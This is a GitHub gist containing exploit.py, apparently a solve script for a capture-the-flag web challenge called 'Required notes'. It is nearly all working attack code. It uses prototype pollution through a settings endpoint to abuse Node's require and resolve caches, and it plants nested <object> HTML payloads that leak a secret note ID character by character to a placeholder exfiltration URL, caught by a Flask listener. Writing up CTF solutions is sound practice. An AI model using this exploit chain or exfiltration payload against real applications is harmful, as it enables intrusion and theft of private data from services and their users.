Skip to content

Instantly share code, notes, and snippets.

@Ze-Pacifist

Ze-Pacifist/exploit.py

Last active February 26, 2024 00:41
Show Gist options
  • Save Ze-Pacifist/9bcd1072a62bbc5850322878b21bc8c8 to your computer and use it in GitHub Desktop.
Save Ze-Pacifist/9bcd1072a62bbc5850322878b21bc8c8 to your computer and use it in GitHub Desktop.
Download ZIP
Required notes solve script
Raw
exploit.py
import requests
from flask import Flask
import string
import time
from threading import Thread
charset=string.digits+string.ascii_lowercase
url="<instance_url>"
proxies={"http":"http://127.0.0.1:8080","https":"http://127.0.0.1:8080"}
useless={"title":"useless","content":"just useless"}
app = Flask(__name__)
def gen_payload(fchar):
payload=""
for i in charset:
i=fchar+i
payload=payload+f"<object data='http://127.0.0.1:3000/search/{i}'><object data='<exfil_url>/found/{i}'></object></object>"
return payload
# Reset settings.proto to clean
def reset_settings():
options={"data":[{"title":"optional"},{"author":"optional"}]}
r=requests.post(url+"customise", json=options, proxies=proxies, verify=False)
print(r.text)
# Write payload note:
def write_expl(expl):
reset_settings()
payload={"title":"asdf","content":expl}
r=requests.post(url+"create", json=payload, proxies=proxies, verify=False)
print("Message From write_expl",r.json()["Message"])
payload_id=r.json()["Noteid"]
return payload_id
def polluter(x,y):
options={"data":[{"title":"option(a).constructor.prototype.data={};optional"},{"author":"optional"}]}
requests.post(url+"customise", json=options, proxies=proxies, verify=False)
requests.post(url+"create", json=useless, proxies=proxies, verify=False)
options={} # For data.pop()
requests.post(url+"customise", json=options, proxies=proxies, verify=False)
#change name to healthcheck note id
options={"data":[{"title":"option(a).constructor.prototype.data.name=\"./notes/"+x+"\";optional"},{"author":"optional"}]}
requests.post(url+"customise", json=options, proxies=proxies, verify=False)
requests.post(url+"create", json=useless, proxies=proxies, verify=False)
#change name to exploit note id
options={"data":[{"title":"option(a).constructor.prototype.data.exports=\"./notes/"+y+".json\";optional"},{"author":"optional"}]}
requests.post(url+"customise", json=options, proxies=proxies, verify=False)
requests.post(url+"create", json=useless, proxies=proxies, verify=False)
def one_step(note):
requests.get(url+"delete") # clear cache
note_id=write_expl(note)
polluter("Healthcheck",note_id)
requests.get(url+"view/Healthcheck", verify=False) # get Healthcheck->note_id into resolve cache & deletes require cache and pathcache
polluter("777",note_id)
requests.get(url+"view/777", verify=False) # get note_id into require cache so Healthcheck->note_id becomes alive again
requests.get(url+"view/"+note_id+"?temp", verify=False) # delete exploit note from file system
r=requests.get(url+"healthcheck", verify=False) # Healthcheck -> note_id still works cuz of relativeResolveCache entry
print(r.text)
# Starting off
#path has to be set only once
requests.packages.urllib3.disable_warnings()
options={"data":[{"title":"option(a).constructor.prototype.path=\"./\";optional"},{"author":"optional"}]}
requests.post(url+"customise", json=options, proxies=proxies, verify=False)
requests.post(url+"create", json=useless, proxies=proxies, verify=False)
def attack(found):
payload=gen_payload(found)
one_step(payload)
@app.route('/')
def hello():
attack("")
return 'Hello, attacker!'
@app.route('/found/<note>')
def found(note):
print("Found: ",note)
try:
thread=Thread(target=attack,args=(note,))
thread.start()
except Exception as e:
print(e)
return f'You found: {note}'
# Gives 15 characters of flag note id. Bruteforce last character.
if __name__ == '__main__':
app.run(host='0.0.0.0')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment